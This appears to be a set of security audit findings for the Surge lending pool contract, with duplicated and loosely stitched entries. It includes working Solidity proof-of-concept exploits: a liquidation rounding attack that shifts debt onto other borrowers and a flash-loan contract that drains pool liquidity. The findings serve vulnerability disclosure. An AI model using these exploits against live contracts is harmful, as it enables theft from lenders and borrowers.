The function `getCurrentState()` gets the current state of the pool variables based on the current time, and other functions use it to update the contract state. It calculates the interest accrued on debt since the last timestamp, but because of integer-division rounding, in some cases the calculated interest would be 0, causing borrowers to pay no interest.\\nThis is part of the `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\nThe code should support all ERC20 tokens, and those tokens may have different decimals. 
also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 2% (2 * 1e16) and MAX_RATE is 10% (1e17), and in the current state the borrow rate is 5% (5 * 1e16).\\ntimeDelta is 2 seconds (two seconds passed from the last accrue interest time).\\ntotalDebt is 100 USDC (100 * 1e6).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e6 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interaction and borrowers would pay 0 interest. the debt decimals and interest rates may differ between pools and the code should support all of them.
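The truncation can be reproduced with Solidity-style integer division (Python's `//` matches EVM division for non-negative operands). The figures follow the formula in the scenario above — 100 * 1e6 raw units of a 6-decimal token at a 5% rate:

```python
YEAR = 365 * 24 * 60 * 60          # 31_536_000 seconds, i.e. "365 days" in Solidity
total_debt = 100 * 10**6           # 100 * 1e6 raw units of a 6-decimal token
borrow_rate = 5 * 10**16           # 5% as a 1e18-scaled mantissa
time_delta = 2                     # seconds since the last accrual

# _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18)
interest = total_debt * borrow_rate * time_delta // (YEAR * 10**18)
print(interest)  # 0 -- the true value is about 0.3 raw units, truncated away
```

Every accrual that lands below one raw token unit is lost entirely, so frequent interactions keep resetting the clock without ever charging interest.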
Don't update the contract state (lastAccrueInterestTime) when the calculated interest is 0. Alternatively, add more precision to the total debt by storing it with extra 1e18 decimals, and when transferring or receiving the debt token, convert the token amount to and from this higher-precision format.
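A sketch of the second suggestion, assuming the pool stored total debt scaled up by 1e18 (the scaling factor and variable names are illustrative, not Surge code). The same accrual that truncated to zero now survives in the scaled representation:

```python
YEAR = 365 * 24 * 60 * 60
SCALE = 10**18                      # assumed extra precision for stored debt

total_debt_scaled = 100 * 10**6 * SCALE   # 100 * 1e6 raw units, scaled
borrow_rate = 5 * 10**16                  # 5% as a 1e18-scaled mantissa
time_delta = 2

interest_scaled = total_debt_scaled * borrow_rate * time_delta // (YEAR * 10**18)
print(interest_scaled > 0)          # True: the fractional interest is retained
print(interest_scaled // SCALE)     # still 0 raw units so far, but the scaled
                                    # total keeps accruing across interactions
```

Conversion back to raw units only happens at transfer time, so sub-unit interest accumulates instead of being discarded on every accrual.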
Borrowers won't pay any interest and lenders will lose funds.
```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt!
medium
A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of liquidate(): it has a rounding-down precision error, and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1 but the debt shares by 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of the debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstrate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note that it rounds down.\\nDue to rounding down, it is possible that while `amount != 0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owes 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). 
In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
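The zero-share rounding behind the PoC comes down to one integer division. Below is a Python sketch of the share conversion (a simplified stand-in for tokenToShares, assuming a non-zero share supply), using the PoC state right before the liquidation loop — total debt of 2399 against 2000 outstanding debt shares:

```python
def token_to_shares(amount, total_debt, shares_supply, round_up):
    # simplified stand-in for Pool.tokenToShares with shares_supply > 0
    if round_up:
        return (amount * shares_supply + total_debt - 1) // total_debt
    return amount * shares_supply // total_debt

# liquidate(address(1), 1): total debt falls by 1, but zero shares are burned
shares = token_to_shares(1, 2399, 2000, round_up=False)
print(shares)  # 0
```

Each such call repays 1 unit of total debt without reducing the borrower's share balance, which is exactly how the loop of 200 one-unit liquidations shifts debt onto the other borrowers.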
We need to handle this edge case by not allowing liquidate() to proceed when the number of debt shares is zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, "Pool: borrower not liquidatable");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n 
lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n
A liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funds from the pool by shifting his debt onto the remaining borrowers.
```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = 
pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs
high
When calculating userCollateralRatioMantissa in borrow and liquidate, the pool divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both the debt and collateral values are left in their native precision. As a result, certain token pairs will be completely broken. Other pairs will only be partially broken and can enter a state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 1,000,001 SHIB (1,000,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 1,000,001e18 = 0\\n```\\n\\nThere are two issues with this. First, a majority of these token pairs simply won't work. Second, because userCollateralRatioMantissa returns 0, there are states in which some debt is impossible to liquidate, breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.
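The truncation is plain to see in raw units (illustrative figures: a 6-decimal loan token against an 18-decimal collateral token, with just over a million collateral tokens so the division lands exactly on zero):

```python
debt = 1 * 10**6                      # 1 unit of a 6-decimal loan token
collateral = 1_000_001 * 10**18       # ~1M units of an 18-decimal collateral

# userDebt * 1e18 / collateralBalance, as computed in borrow() and liquidate()
ratio = debt * 10**18 // collateral
print(ratio)  # 0 -- "ratio > threshold" can never hold, so no liquidation
```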
userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points
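A sketch of that normalization (the helper and the decimals arguments are illustrative; in practice the decimals would come from the token contracts):

```python
def normalize(raw_amount, decimals):
    # scale any raw token amount to 18-decimal fixed point
    return raw_amount * 10**18 // 10**decimals

debt = normalize(1 * 10**6, 6)                   # 1 loan token -> 1e18
collateral = normalize(1_000_001 * 10**18, 18)   # unchanged: already 18 decimals

ratio = debt * 10**18 // collateral
print(ratio > 0)  # True: the ratio is now comparable against 1e18 mantissas
```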
Some token pairs will be broken from the start, while others will become broken over time.
```\\n1e6 * 1e18 / 1,000,001e18 = 0\\n```\\n
Users can borrow all loan tokens
medium
Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = 
abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\nimport "../src/Pool.sol";\\nimport "../src/Factory.sol";\\nimport "./mocks/Borrower.sol";\\nimport "./mocks/ERC20.sol";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), "G");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n 
collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n
A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.
The vulnerability allows draining all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be exploited by the same or other actors every time a loan is repaid or a new deposit is made, by tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with an economic incentive to perform this attack would be when the collateral token price drops at a high rate: an attacker could borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.
```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n
Fee share calculation is incorrect
medium
Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares to the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.
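The arithmetic above can be checked with a quick sketch (plain Python, mirroring the report's numbers):

```python
# Numbers from the example above
supplied, total_supply = 100, 100
interest, fee = 10, 2

# Current (buggy) formula: shares minted for the fee
shares_buggy = fee * total_supply / supplied  # 2.0 shares
# Value of those shares once interest is included in the pool
value_buggy = shares_buggy * (supplied + interest) / (total_supply + shares_buggy)

# Revised formula from the finding
shares_fixed = total_supply * fee / (supplied + interest - fee)  # ~1.852 shares
value_fixed = shares_fixed * (supplied + interest) / (total_supply + shares_fixed)
```

`value_buggy` comes out to about 2.157, over-paying the recipient, while `value_fixed` equals the intended fee of 2.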
Use the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n
Fee recipient is given more fees than intended, which results in less interest for LPs
```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n
fund loss because calculated Interest would be 0 in getCurrentState() due to division error
medium
function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. 
Also, different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. Imagine this scenario:\\nThe debt token is USDC, which has 6 decimals.\\nMIN_RATE is 2% (2 * 1e16), MAX_RATE is 10% (1e17), and the current borrow rate is 5% (5 * 1e16).\\ntimeDelta is 2 seconds (two seconds passed since the last interest accrual).\\ntotalDebt is 100 USDC (100 * 1e6).\\nEach year has about 31M seconds (31 * 1e6).\\nNow the code would calculate the interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e6 * 1e18) = 10 / 31 = 0` (integer division truncates).\\nSo the code would calculate 0 interest on each interaction and borrowers would pay 0 interest. The debt token decimals and interest rates may differ between pools, and the code should support all of them.
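The truncation can be reproduced with integer arithmetic (a sketch using the scenario's numbers; variable names are illustrative):

```python
YEAR = 365 * 24 * 3600            # "365 days" in seconds

total_debt = 100 * 10**6          # 100 USDC (6 decimals)
borrow_rate = 5 * 10**16          # 5% APR, 1e18-scaled
time_delta = 2                    # seconds since last accrual

# Mirrors: _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18)
interest = total_debt * borrow_rate * time_delta // (YEAR * 10**18)

# Tracking the debt with 1e18 extra precision (one suggested mitigation)
# avoids the truncation for the same scenario
scaled_debt = 100 * 10**18
scaled_interest = scaled_debt * borrow_rate * time_delta // (YEAR * 10**18)
```

With 6-decimal accounting the accrued interest rounds down to 0; with 1e18-scaled accounting it stays non-zero.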
Don't update the contract state (lastAccrueInterestTime) when the calculated interest is 0. Alternatively, track the total debt with extra 1e18 decimals of precision, and convert token amounts to and from this higher-precision format when transferring or receiving the debt token.
Borrowers won't pay any interest and lenders will lose funds.
